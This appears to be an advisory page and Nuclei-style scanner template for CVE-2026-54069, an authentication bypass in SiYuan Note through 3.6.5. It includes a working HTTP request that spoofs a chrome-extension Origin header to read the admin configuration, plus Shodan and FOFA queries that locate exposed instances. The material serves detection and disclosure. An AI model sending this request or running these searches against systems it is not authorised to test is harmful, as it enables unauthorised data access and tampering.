SiYuan Note <= 3.6.5 - Authentication Bypass
CVE-2026-54069
Early Release
Description
SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
Severity
High
CVSS Score
9.1
Affected Product
siyuan
Published Date
June 17, 2026
Template Author
0x_akoko
CVE-2026-54069.yaml
id: CVE-2026-54069
info:
name: SiYuan Note <= 3.6.5 - Authentication Bypass
author: 0x_Akoko
severity: high
description: |
SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
impact: |
Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
remediation: |
Update to SiYuan Note v3.7.0 or later.
reference:
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
- https://nvd.nist.gov/vuln/detail/CVE-2026-54069
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2026-54069
cwe-id: CWE-346
metadata:
verified: false
max-request: 1
vendor: siyuan-note
product: siyuan
shodan-query: title:"SiYuan"
fofa-query: title="SiYuan" || body="siyuan"
tags: cve,cve2026,siyuan,auth-bypass,unauth
http:
- raw:
- |
POST /api/system/getConf HTTP/1.1
Host: {{Hostname}}
Origin: chrome-extension://auth-test
Content-Type: application/json
{}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "\"code\":0")'
- 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
condition: and
# digest: 4a0a004730450221008db34a7b309ceb09c96dfb7f6b932a9edcf0c2ee6184a6bc06702991f65be0de02201a8a8e0340fd46d0f0392a81748d561d91128a9ac2b46dcda38068f13d47d646:922c64590222798bb761d5b6d8e729509.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2026-54069
CWE ID:
cwe-346
Remediation Steps
Update to SiYuan Note v3.7.0 or later.